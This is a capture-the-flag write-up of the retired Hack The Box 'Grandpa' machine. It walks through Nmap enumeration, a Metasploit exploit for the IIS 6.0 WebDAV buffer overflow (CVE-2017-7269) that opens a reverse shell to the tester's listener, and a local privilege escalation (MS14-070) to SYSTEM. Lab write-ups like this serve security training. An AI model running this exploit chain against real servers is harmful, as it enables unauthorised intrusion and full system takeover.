This is a writeup for the retired Hack The Box Grandpa machine.
- Machine URL: https://www.hackthebox.com/machines/grandpa
- Machine IP: 10.10.10.14
- Time Required: 1h
Solution Summary
The Grandpa machine is an old Windows system with Microsoft IIS 6.0 running on it. The vulnerability we managed to exploit this time are:
- CVE-2017-7269 (WebDAV buffer overflow): https://nvd.nist.gov/vuln/detail/cve-2017-7269
- CVE-2014-4076 (TCP IOCTL privilege escalation): https://nvd.nist.gov/vuln/detail/CVE-2014-4076
Since chaining these exploits is tricky, we used Metasploit to chain them and gain privileges on the machine.
Solution
The steps to solving this machine are:
- Map out the machine with Nmap and find exposed Microsoft IIS 6.0 with WebDAV.
- Enumerate WebDAV vulnerabilities.
- Exploit WebDAV buffer overflow with Metasploit
iis_webdav_scstoragepathfromurlexploit module. - Post-exploit, leverage TCP IOCTL privilege escalation Metasploit module
ms14_070_tcpip_ioctlto becomeNT AUTHORITY\SYSTEM. - Read out the flags.
Nmap
First, we identify exposed services on this machine:
nmap -sV -sC -A -oX machines/grandpa/nmap.xml 10.10.10.14
The results are:
Starting Nmap 7.94 ( https://nmap.org ) at 2024-09-10 08:43 JST
Nmap scan report for 10.10.10.14
Host is up (0.083s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
|_http-server-header: Microsoft-IIS/6.0
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
| http-webdav-scan:
| WebDAV type: Unknown
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| Server Date: Mon, 09 Sep 2024 23:33:42 GMT
|_ Server Type: Microsoft-IIS/6.0
|_http-title: Under Construction
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.49 seconds
Findings:
- Old Microsoft ISS 6.0 running on TCP/80
- Same WebDAV exploit as Granny machine previously owned here
WebDAV
The landing page is not so interesting
Open in new tab
(full image size 43 KiB)
We test whether arbitrary files can be uploaded to this server:
davtest.pl -url http://10.10.10.14
Of course, this is not an exact copy of the Granny machine, so we must find a
different approach to this machine. As we can see,
davtest fails to upload files.
********************************************************
Testing DAV connection
OPEN SUCCEED: http://10.10.10.14
********************************************************
NOTE Random string for this session: uj5EWcwWxxc9q
********************************************************
Creating directory
MKCOL FAIL
********************************************************
Sending test files
PUT asp FAIL
PUT shtml FAIL
PUT pl FAIL
PUT cfm FAIL
PUT txt FAIL
PUT html FAIL
PUT aspx FAIL
PUT jhtml FAIL
PUT php FAIL
PUT cgi FAIL
PUT jsp FAIL
********************************************************
Metasploit
Instead, we want to make us of CVE-2017-7269. Since this is a bit tricky to pull of, we’ll use Metasploit to exploit this vulnerability and upload a shell.
The machine hung up at this point, and I had to reset it. After the machine
reset, the following commands in msfconsole can be run to get a reverse
shell:
use exploit/windows/iis/iis_webdav_scstoragepathfromurl
set rhosts 10.10.10.14
set lhost 10.10.16.6
set lport 4444
run
Then inside Meterpreter, we migrate to another process and put the Meterpreter in the background to escalate upwards to the system authority.
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
[...]
1956 584 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK C:\WINDOWS\system32\
SERVICE wbem\wmiprvse.exe
2096 392 vssvc.exe
2160 1484 w3wp.exe x86 0 NT AUTHORITY\NETWORK c:\windows\system32\
SERVICE inetsrv\w3wp.exe
2228 584 davcdata.exe x86 0 NT AUTHORITY\NETWORK C:\WINDOWS\system32\
SERVICE inetsrv\davcdata.exe
[...]
meterpreter > migrate 2160
[*] Migrating from 2280 to 2160...
[*] Migration completed successfully.
meterpreter > background
Privilege Escalation
Now that we’ve put the Meterpreter session in the background, we try to use the
same TCP IOCTL exploit
(CVE-2014-4076) that we also
used for the Granny challenge to escalate privileges.
use exploit/windows/local/ms14_070_tcpip_ioctl
set SESSION 1
exploit
sessions -i 1
The session gets upgraded and we are NT AUTHORITY\SYSTEM:
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Retrieving the flags
We search for the flag:
meterpreter > search -d "C:/Documents and Settings" -f *.txt
Found 14 results...
===================
Path Size (bytes) Modified (UTC)
---- ------------ --------------
C:\Documents and Settings\Administrator\Desktop\root.txt 32 2017-04-12 23:29:33 +0900
[...]
C:\Documents and Settings\Harry\Desktop\user.txt 32 2017-04-12 23:32:26 +0900
[...]
We can print out the flags like so:
meterpreter > cat 'C:\Documents and Settings\Administrator\Desktop\root.txt'
meterpreter > cat 'C:\Documents and Settings\Harry\Desktop\user.txt'
The flags are:
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX